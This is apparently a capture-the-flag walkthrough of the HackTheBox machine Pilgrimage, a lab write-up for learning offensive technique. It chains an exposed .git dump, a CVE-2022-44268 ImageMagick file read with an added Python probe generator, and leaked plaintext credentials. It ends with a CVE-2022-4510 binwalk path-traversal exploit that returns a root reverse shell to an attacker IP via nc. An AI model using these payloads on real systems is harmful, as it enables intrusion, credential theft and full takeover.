Information gathering

nmap port scan

Only ports 22 and 80 are open:

sudo nmap -p- --min-rate 10000 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-24 12:37 CST
Warning: 10.10.11.219 giving up on port because retransmission cap hit (10).
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.090s latency).
Not shown: 63504 closed tcp ports (reset), 2029 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Detailed nmap scan

This reveals the hostname pilgrimage.htb (10.10.11.219) and an exposed Git repository at /.git/; add the hostname to /etc/hosts. The FortiGate OS guess at the end of the output can be ignored: nmap itself warns the fingerprint is unreliable because only a single port was probed.

sudo nmap -sT -sV -sC -O -p80 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-24 12:40 CST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.071s latency).

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-server-header: nginx/1.18.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall
Running: Fortinet embedded
OS details: Fortinet FortiGate-50B or 310B firewall

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds

GitHack scan

The Git repository found in the previous step means the site's .git directory is served to anyone, so the source can be dumped with GitHack. The recovered tree holds the PHP sources and, unusually, the 27 MB `magick` binary the application shells out to:

python3 GitHack.py http://pilgrimage.htb/.git/
ls -al
total 26968
drwxr-xr-x 4 kali kali     4096 Jan 24 12:46 .
drwxr-xr-x 5 kali kali     4096 Jan 24 12:45 ..
drwxr-xr-x 6 kali kali     4096 Jan 24 12:45 assets
-rw-r--r-- 1 kali kali     5538 Jan 24 12:46 dashboard.php
-rw-r--r-- 1 kali kali     9250 Jan 24 12:46 index.php
-rw-r--r-- 1 kali kali     6822 Jan 24 12:46 login.php
-rw-r--r-- 1 kali kali       98 Jan 24 12:46 logout.php
-rw-r--r-- 1 kali kali 27555008 Jan 24 12:46 magick
-rw-r--r-- 1 kali kali     6836 Jan 24 12:46 register.php
drwxr-xr-x 4 kali kali     4096 Jan 24 12:46 vendor

User

ImageMagick

#index.php (excerpt; the upload handler)
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  $image = new Bulletproof\Image($_FILES);
  if($image["toConvert"]) {
    $image->setLocation("/var/www/pilgrimage.htb/tmp");
    $image->setSize(100, 4000000);
    $image->setMime(array('png','jpeg'));
    $upload = $image->upload();
    if($upload) {
      $mime = ".png";
      $imagePath = $upload->getFullPath();
      if(mime_content_type($imagePath) === "image/jpeg") {
        $mime = ".jpeg";
      }
      $newname = uniqid();
      // every accepted upload is handed to the bundled ImageMagick binary for resizing
      exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);
      unlink($upload->getFullPath());
      $upload_path = "http://pilgrimage.htb/shrunk/" . $newname . $mime;
      if(isset($_SESSION['user'])) {
        $db = new PDO('sqlite:/var/db/pilgrimage');
        $stmt = $db->prepare("INSERT INTO `images` (url,original,username) VALUES (?,?,?)");
        $stmt->execute(array($upload_path,$_FILES["toConvert"]["name"],$_SESSION['user']));
      }
      header("Location: /?message=" . $upload_path . "&status=success");
    }
    // ... failure branch not shown in the excerpt
  }
}

The code handles uploading and resizing images for the site. When a POST carries an image, it stores the upload in /var/www/pilgrimage.htb/tmp, runs it through ImageMagick, deletes the temporary copy and, if the user is logged in, records the result in the database under their username. The user is then redirected back with a success (or failure) message.

The resizing is done by ImageMagick (specifically `magick convert`), and the result is saved under /shrunk and served back at http://pilgrimage.htb/shrunk/<id>.png; whatever the converter writes into the output image, we get to download.

ImageMagick, invoked from the command line as `magick`, is a free, open-source, cross-platform suite for displaying, creating, converting, modifying and editing raster images. The copy used here is the standalone binary committed to the repository, so we can inspect the exact build the server runs.

`./magick --version` reports ImageMagick 7.1.0-49, which is affected by CVE-2022-44268, an arbitrary file read (fixed in 7.1.0-52): when a PNG with a tEXt chunk whose keyword is `profile` is converted, the library reads the file named in that chunk's value and embeds its bytes in the output image as a profile. Since the server converts every upload with this binary and serves the result back, that gives us file reads as the web server user.

./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

Use the public PoC directly; it generates a PNG with the requested path embedded:

git clone https://github.com/voidz0r/CVE-2022-44268
cd CVE-2022-44268
cargo run "/etc/passwd"

Cargo is the build and dependency manager for the Rust programming language; `cargo run` compiles the PoC and runs it, writing image.png with the target path embedded.

Upload the generated image.png to the site and download the shrunk result; the converted file now carries the contents of /etc/passwd as an embedded profile.

identify prints information about an image file (format, resolution, colour depth and so on). With -verbose it also dumps every property and embedded profile in full, which is where the leaked file content ends up.

In the grep, -P selects Perl-compatible regular expressions and -v inverts the match, keeping only the lines that do not match.

The pattern "^( |Image)" matches lines beginning with a space or with "Image". Every ordinary identify line is indented (or is the leading "Image:" header), while the embedded profile is printed as unindented rows of hex, so the inverted match leaves just the hex:

identify -verbose 65b098f813ad9.png | grep -Pv "^( |Image)"

Hex-decoding that output gives:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

One real user stands out: emily (uid 1000, with a login shell).

register.php shows that the database is SQLite, lives at /var/db/pilgrimage, and stores passwords in plaintext:

#register.php (excerpt)
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['username'] && $_POST['password']) {
  $username = $_POST['username'];
  $password = $_POST['password'];

  // the password goes into the users table unhashed
  $db = new PDO('sqlite:/var/db/pilgrimage');
  $stmt = $db->prepare("INSERT INTO `users` (username,password) VALUES (?,?)");
  $status = $stmt->execute(array($username,$password));
  // ...
}

Next, try to pull /var/db/pilgrimage itself: repeat the procedure, generate an image for that path, upload it and download the result;

cargo run "/var/db/pilgrimage"
identify -verbose 65b09b31d31ba.png| grep -Pv "^( |Image)"

53514c69746520666f726d617420330010000101004020200000007c0000000500000000
000000000000000400000004000000000000000000000001000000000000000000000000
00000000000000000000000000000000000000000000007c002e4b910d0ff800040*****

The database is binary, and the PoC script only handles the result as ASCII text, so I take the data out by hand: download the converted file from the site, isolate the hex rows with the same grep, and turn them back into bytes with xxd:

identify -verbose 65b09b31d31ba.png| grep -Pv "^( |Image)"| xxd -r -p > pilgrimage.sqlite

xxd -r reverses a hex dump back into binary and -p selects plain mode (no addresses or ASCII column, which matches the bare hex rows identify printed); > redirects the result into pilgrimage.sqlite. Nothing is lost on the way, so the database comes back byte-for-byte intact.
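As an added example (my code, not the voidz0r PoC and not anything from the target), the following Python builds the same kind of probe PNG the PoC produces and then decodes what comes back, both from the `identify -verbose` text exactly as the grep/xxd pipeline above does and directly from the converted PNG's text chunks. It serves the PoC step earlier and the manual hex extraction just described. The "Raw profile type" chunk layout it parses (blank line, profile name, byte count, hex rows) is my understanding of how ImageMagick serialises raw profiles and is an assumption; the sample identify output embedded in the block is constructed, not captured from the box.

```python
"""Probe PNG for CVE-2022-44268 and decoders for what ImageMagick leaks (added example)."""
import struct
import sys
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# Constructed sample of `identify -verbose` output (not captured from the box):
# every attribute line is indented, the leaked profile is printed as bare hex rows.
SAMPLE_IDENTIFY_OUTPUT = """Image: 65b098f813ad9.png
  Format: PNG (Portable Network Graphics)
  Geometry: 1x1+0+0
  Properties:
    Raw profile type:

      32
726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a
"""


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32(type + data), as the PNG spec requires."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_probe_png(target_path: str) -> bytes:
    """1x1 RGB PNG whose tEXt chunk has keyword 'profile' and the target path as text.

    Vulnerable ImageMagick (before 7.1.0-52) treats that keyword as a request to load
    a profile from the named file and copies the file's bytes into the converted image.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, truecolour
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")       # filter byte 0 + one black pixel
    text = b"profile\x00" + target_path.encode()          # keyword NUL text
    return (PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk; stops at IEND, raises on a bad signature."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        yield ctype, png[pos + 8:pos + 8 + length]
        pos += 12 + length
        if ctype == b"IEND":
            break


def decode_identify_output(text: str) -> bytes:
    """Python form of: identify -verbose x.png | grep -Pv '^( |Image)' | xxd -r -p

    Keeps only lines that are neither indented nor the 'Image:' header, i.e. the hex
    rows, and turns them back into bytes, so binary files such as SQLite survive.
    """
    rows = [ln.strip() for ln in text.splitlines() if ln and not ln.startswith((" ", "Image"))]
    return bytes.fromhex("".join(rows))


def raw_profile_chunk(name: str, payload: bytes, compress: bool = False) -> bytes:
    """Build a 'Raw profile type <name>' chunk in the layout assumed below (for self-tests)."""
    body = ("\n%s\n%8d\n" % (name, len(payload))).encode() + payload.hex().encode() + b"\n"
    key = b"Raw profile type " + name.encode()
    if compress:  # zTXt: keyword NUL method(0) zlib-data
        return png_chunk(b"zTXt", key + b"\x00\x00" + zlib.compress(body))
    return png_chunk(b"tEXt", key + b"\x00" + body)


def extract_raw_profiles(png: bytes) -> dict:
    """Decode every raw-profile text chunk of a converted PNG without going through identify.

    Assumed body layout: '\\n<name>\\n<byte count>\\n<hex rows>'; tEXt plain, zTXt zlib-packed.
    """
    found = {}
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, body = data.partition(b"\x00")
        if not keyword.startswith(b"Raw profile type"):
            continue
        if ctype == b"zTXt":
            body = zlib.decompress(body[1:])  # skip the compression-method byte
        lines = body.decode("latin-1").split("\n")
        name, expected = lines[1], int(lines[2])
        payload = bytes.fromhex("".join(lines[3:]))
        if len(payload) != expected:
            raise ValueError("profile %r: %d bytes, header says %d" % (name, len(payload), expected))
        found[name] = payload
    return found


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open("probe.png", "wb") as fh:
        fh.write(build_probe_png(target))
    print("wrote probe.png asking for", target)
    print(decode_identify_output(SAMPLE_IDENTIFY_OUTPUT).decode())
```

Run it with the path to read as the only argument, upload the resulting probe.png, and either feed the downloaded shrunk image to `extract_raw_profiles` or save the `identify -verbose` text and pass it to `decode_identify_output`. Both paths work on bytes, which is what the text-only PoC could not do for the SQLite file.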

The users table in pilgrimage.sqlite holds emily's password in plaintext, exactly as register.php stored it:

sqlite3 pilgrimage.sqlite
SQLite version 3.43.1 2023-09-11 12:01:27
Enter ".help" for usage hints.
sqlite> .tables
images users
sqlite> select * from users;
emily|abigchonkyboi123

SSH login

ssh emily@10.10.11.219
password:abigchonkyboi123

Binwalk

Privilege checks

emily@pilgrimage:~$ sudo -l 
[sudo] password for emily:
Sorry, user emily may not run sudo on pilgrimage.

find / -perm -u=s -type f 2>/dev/null also turns up nothing useful, so the next stop is what root is running:

ps aux | grep root
root 765 0.0 0.0 6816 2844 ? Ss Nov09 0:00 /bin/bash /usr/sbin/malwarescan.sh
root 766 0.0 0.0 0 0 ? S Nov09 0:00 [hwmon1]
root 771 0.0 0.6 209752 27736 ? Ss Nov09 1:07 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
root 773 0.0 0.1 220796 6840 ? Ssl Nov09 0:00 /usr/sbin/rsyslogd -n -iNONE
root 775 0.0 0.0 2516 720 ? S Nov09 0:00 /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/
root 776 0.0 0.0 6816 2288 ? S Nov09 0:00 /bin/bash /usr/sbin/malwarescan.sh

root is running /usr/sbin/malwarescan.sh, and next to it an inotifywait process watching for files created in /var/www/pilgrimage.htb/shrunk/, the directory the web app writes converted images to. inotifywait is a way to trigger a process whenever a chosen filesystem event occurs.

/usr/sbin/malwarescan.sh contains:

#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
    binout="$(/usr/local/bin/binwalk -e "$filename")"
    for banned in "${blacklist[@]}"; do
        if [[ "$binout" == *"$banned"* ]]; then
            /usr/bin/rm "$filename"
            break
        fi
    done
done

inotifywait is a Linux command-line tool that watches for filesystem events through the kernel's inotify interface: creation, deletion, modification, moves and so on, for a file or directory. When one occurs it can react immediately, for example by running a command or script. Here it runs in monitor mode (-m) and feeds every create event in shrunk/ into the loop.

Binwalk is a tool for finding embedded files and executable code inside a binary image; it is mainly used to carve firmware images. Note the order of operations in the script: `binwalk -e` extracts the file as root before the blacklist is consulted, and the blacklist only inspects the signature names binwalk printed, so the check cannot undo anything the extraction itself did.

The installed Binwalk is version 2.3.2, which is affected by CVE-2022-4510, a path traversal in its PFS filesystem extractor (fixed in 2.3.4). A crafted image carries an entry whose name climbs out of the extraction directory, so `binwalk -e` writes it anywhere the running user can write; the public exploit drops a Python file into ~/.config/binwalk/plugins/, which binwalk imports and executes on its next run. Because the watcher runs binwalk as root on every file that appears in shrunk/, this is our route to root.
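To make the bug class concrete, here is an added Python example (my code, not binwalk's) of the check that was missing: an extractor takes file names from an untrusted image and joins them onto its output directory. The naive join is shown beside a hardened one that resolves the destination and refuses anything that lands outside the extraction root. The entry names and the /tmp/pfs-root output directory are constructed for the demonstration.

```python
"""Unsafe versus hardened destination paths for an archive/filesystem extractor (added example)."""
import os


def unsafe_target(out_dir: str, entry_name: str) -> str:
    """What a naive extractor does: trust the entry name taken from the image.

    os.path.join discards out_dir entirely when entry_name is absolute, and '..'
    components walk out of it, so the attacker chooses where the file is written.
    """
    return os.path.normpath(os.path.join(out_dir, entry_name))


def safe_target(out_dir: str, entry_name: str) -> str:
    """Resolve the destination and refuse anything outside out_dir.

    realpath() also follows symlinks in directories extracted earlier, which closes
    the second classic escape (extract a symlink first, then write through it).
    """
    root = os.path.realpath(out_dir)
    if not entry_name or os.path.isabs(entry_name) or entry_name.startswith("\\"):
        raise ValueError("absolute or empty entry name rejected: %r" % entry_name)
    if "\x00" in entry_name:
        raise ValueError("NUL byte in entry name: %r" % entry_name)
    candidate = os.path.realpath(os.path.join(root, entry_name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise ValueError("entry escapes extraction root: %r" % entry_name)
    return candidate


def classify(out_dir: str, names) -> dict:
    """Run every entry name through safe_target and record whether it was accepted."""
    result = {}
    for name in names:
        try:
            safe_target(out_dir, name)
            result[name] = "ok"
        except ValueError:
            result[name] = "rejected"
    return result


# Constructed entry names: one benign, the rest shaped like traversal payloads.
SAMPLE_ENTRIES = [
    "etc/config.txt",
    "../../../../../.config/binwalk/plugins/binwalk.py",
    "/etc/cron.d/backdoor",
    "sub/../../escaped",
]

if __name__ == "__main__":
    out = "/tmp/pfs-root"
    for name in SAMPLE_ENTRIES:
        print("%-55r naive -> %s" % (name, unsafe_target(out, name)))
    print(classify(out, SAMPLE_ENTRIES))
```

The second entry is the shape of the CVE-2022-4510 payload: with the naive join and a root-owned extractor it resolves to a file under /root/.config/binwalk/plugins/, while the hardened join rejects it before anything is written.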

Use the public PoC script (exp.py), giving it a carrier image plus the listener address and port:

python3 exp.py image.png 10.10.16.8 5555

Place the generated binwalk_exploit.png in /var/www/pilgrimage.htb/shrunk/ on the target; that is the directory the watcher scans, and emily can write to it. Here the file is served from the attacker machine with a throwaway HTTP server and fetched with wget:

# on the attacker machine, from the directory holding binwalk_exploit.png
python3 -m http.server

# on the target, as emily
cd /var/www/pilgrimage.htb/shrunk && wget http://10.10.16.8:8000/binwalk_exploit.png

Have the listener running locally before the wget (the scan fires as soon as the file is created); the reverse shell comes back from the root-owned scanner:

nc -lnvp 5555

Summary

nmap finds port 80 and the exposed .git directory. Dumping and auditing the source shows that every upload is passed through a copy of the magick binary that was itself committed to the repository; `magick --version` gives 7.1.0-49, vulnerable to the CVE-2022-44268 arbitrary file read. The source also reveals the SQLite database path, so the same bug is used to pull the database out, and it contains emily's plaintext credentials (emily|abigchonkyboi123). After logging in over SSH, the usual sudo and SUID checks find nothing, but root's process list shows /usr/sbin/malwarescan.sh running `binwalk -e` on every file created in shrunk/, and that binwalk (2.3.2) has the CVE-2022-4510 path traversal that leads to code execution. Exploiting it from the watched directory gives a root shell.